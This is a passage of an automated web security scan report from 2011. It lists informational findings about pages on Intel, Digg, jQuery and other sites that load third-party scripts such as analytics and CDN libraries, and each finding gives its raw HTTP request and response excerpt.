<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.vproexpert.com/E24VZ/sdmenu/sdmenu.js"> </script>
...[SNIP]...

18.32. http://communities.intel.com/community/tech  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/tech

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /community/tech HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=A6A7D75900DB7F9498266317E36D34BE.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038313b; Expires=Mon, 07-Mar-2011 23:15:57 GMT; Path=/
X-JAL: 269
Content-Language: en-US
CacheHit: D=278002 t=1296947755835805
X-JSL: D=278007 t=1296947755835805
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.33. http://communities.intel.com/community/tech/desktop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /community/tech/desktop

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /community/tech/desktop HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=655258FED1C8CE54639970DB6AAC28EB.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323038323b; Expires=Mon, 07-Mar-2011 23:15:54 GMT; Path=/
X-JAL: 111
Content-Language: en-US
CacheHit: D=120980 t=1296947753199224
X-JSL: D=120985 t=1296947753199224
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.34. http://communities.intel.com/index.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://communities.intel.com
Path:   /index.jspa

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /index.jspa HTTP/1.1
Host: communities.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=84414FB0E56F8779A8C027A76AA897B4.node7OP; Domain=.intel.com; Path=/
Set-Cookie: SecureScheme=true; Secure
Set-Cookie: jive.server.info="serverName=communities.intel.com:serverPort=80:contextPath=:localName=communities.intel.com:localPort=80:localAddr=communities.intel.com"; Version=1; Path=/
X-JAL: 497
Content-Language: en-US
CacheHit: D=506181 t=1296947752876810
X-JSL: D=506186 t=1296947752876810
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.35. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
  • http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js
  • http://cdn3.diggstatic.com/js/lib.56731306.js

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn3.diggstatic.com/js/lib.56731306.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.36. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn1.diggstatic.com/js/m/lib.b2eeaa6c.js
  • http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=ecf040374803e538bd55ad8d0e2e3590e4758659323071ed57f7524ccb84e0a0; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22082 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3359

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...
</div>


<script src="http://cdn1.diggstatic.com/js/m/lib.b2eeaa6c.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.37. http://docs.jquery.com/UI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:12 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.38. http://docs.jquery.com/UI/Accordion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.39. http://docs.jquery.com/UI/Tabs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Tabs

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Tabs HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

18.40. http://edc.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edc.intel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://widgets.digg.com/buttons.js

Request

GET / HTTP/1.1
Host: edc.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0bji1e55d122iazpcqenu355; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:17:23 GMT
Connection: close
Content-Length: 70848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00
...[SNIP]...
<li class="digg">
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sgrogan"></script>
...[SNIP]...

18.41. http://edc.intel.com/About/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edc.intel.com
Path:   /About/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://widgets.digg.com/buttons.js

Request

GET /About/ HTTP/1.1
Host: edc.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=hlfql3zl4uup4pepy0p2jses; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:17:28 GMT
Connection: close
Content-Length: 73615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00
...[SNIP]...
<li class="digg">
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sgrogan"></script>
...[SNIP]...

18.42. http://edc.intel.com/Platforms/Roadmap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edc.intel.com
Path:   /Platforms/Roadmap/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://widgets.digg.com/buttons.js

Request

GET /Platforms/Roadmap/ HTTP/1.1
Host: edc.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2hdok02x1dpz1hzv5o15erng; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:17:26 GMT
Connection: close
Content-Length: 442613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00
...[SNIP]...
<li class="digg">
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sgrogan"></script>
...[SNIP]...

18.43. http://edc.intel.com/Step-by-Step/Selector-Guide/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edc.intel.com
Path:   /Step-by-Step/Selector-Guide/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://widgets.digg.com/buttons.js

Request

GET /Step-by-Step/Selector-Guide/ HTTP/1.1
Host: edc.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=b25zxpftzkbp4mfyjamtgp55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:17:22 GMT
Connection: close
Content-Length: 51675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00
...[SNIP]...
<li class="digg">
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sgrogan"></script>
...[SNIP]...

18.44. http://flesler.blogspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://flesler-blog.googlecode.com/svn/trunk/comments.js
  • http://flesler-blog.googlecode.com/svn/trunk/ga.init.js
  • http://flesler-blog.googlecode.com/svn/trunk/helpers.js
  • http://www.blogger.com/static/v1/widgets/2885921908-widgets.js
  • http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:47 GMT
Date: Sat, 05 Feb 2011 23:17:47 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<link href='http://flesler-blog.googlecode.com/svn/trunk/style.css' rel='stylesheet' type='text/css'/>
<script src='http://flesler-blog.googlecode.com/svn/trunk/helpers.js' type='text/javascript'></script>
...[SNIP]...
<!-- MY INCLUDES -->
<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/ga.init.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/comments.js' type='text/javascript'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
...[SNIP]...

18.45. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /2007/10/jquerylocalscroll-10.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/Flesler?i=http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html
  • http://flesler-blog.googlecode.com/svn/trunk/comments.js
  • http://flesler-blog.googlecode.com/svn/trunk/ga.init.js
  • http://flesler-blog.googlecode.com/svn/trunk/helpers.js
  • http://www.blogger.com/static/v1/widgets/2885921908-widgets.js
  • http://www.google-analytics.com/ga.js

Request

GET /2007/10/jquerylocalscroll-10.html HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:48 GMT
Date: Sat, 05 Feb 2011 23:17:48 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<link href='http://flesler-blog.googlecode.com/svn/trunk/style.css' rel='stylesheet' type='text/css'/>
<script src='http://flesler-blog.googlecode.com/svn/trunk/helpers.js' type='text/javascript'></script>
...[SNIP]...
</p>
<script charset='utf-8' src='http://feeds.feedburner.com/~s/Flesler?i=http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html' type='text/javascript'></script>
...[SNIP]...
<!-- MY INCLUDES -->
<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/ga.init.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/comments.js' type='text/javascript'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
...[SNIP]...

18.46. http://flesler.blogspot.com/2007/10/jqueryscrollto.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flesler.blogspot.com
Path:   /2007/10/jqueryscrollto.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://feeds.feedburner.com/~s/Flesler?i=http://flesler.blogspot.com/2007/10/jqueryscrollto.html
  • http://flesler-blog.googlecode.com/svn/trunk/comments.js
  • http://flesler-blog.googlecode.com/svn/trunk/ga.init.js
  • http://flesler-blog.googlecode.com/svn/trunk/helpers.js
  • http://www.blogger.com/static/v1/widgets/2885921908-widgets.js
  • http://www.google-analytics.com/ga.js

Request

GET /2007/10/jqueryscrollto.html HTTP/1.1
Host: flesler.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sat, 05 Feb 2011 23:17:47 GMT
Date: Sat, 05 Feb 2011 23:17:47 GMT
Last-Modified: Fri, 04 Feb 2011 06:24:24 GMT
ETag: "ead027ca-aead-4359-8b36-1fe3cdfd8f2e"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/g
...[SNIP]...
<link href='http://flesler-blog.googlecode.com/svn/trunk/style.css' rel='stylesheet' type='text/css'/>
<script src='http://flesler-blog.googlecode.com/svn/trunk/helpers.js' type='text/javascript'></script>
...[SNIP]...
</p>
<script charset='utf-8' src='http://feeds.feedburner.com/~s/Flesler?i=http://flesler.blogspot.com/2007/10/jqueryscrollto.html' type='text/javascript'></script>
...[SNIP]...
<!-- MY INCLUDES -->
<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/ga.init.js' type='text/javascript'></script>
<script src='http://flesler-blog.googlecode.com/svn/trunk/comments.js' type='text/javascript'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/2885921908-widgets.js"></script>
...[SNIP]...

18.47. http://gmarwaha.com/jquery/jcarousellite/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gmarwaha.com
Path:   /jquery/jcarousellite/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://digg.com/tools/diggthis.js
  • http://edge.quantserve.com/quant.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google-analytics.com/urchin.js
  • http://www.statcounter.com/counter/counter.js

Request

GET /jquery/jcarousellite/ HTTP/1.1
Host: gmarwaha.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30189

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- Start - Google analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.48. http://idfcommunity.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idfcommunity.intel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.js
  • http://maps.google.com/maps/api/js?sensor=true

Request

GET / HTTP/1.1
Host: idfcommunity.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:17:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 116239


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Intel Deve
...[SNIP]...
<![endif]-->


<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script>
...[SNIP]...

18.49. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:23 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 15:06:39 GMT
ETag: "7520fc2-3ea2-c344bdc0"
Accept-Ranges: bytes
Content-Length: 16034
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

18.50. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 23:21:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.51. http://newsroom.intel.com/ann-delete.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
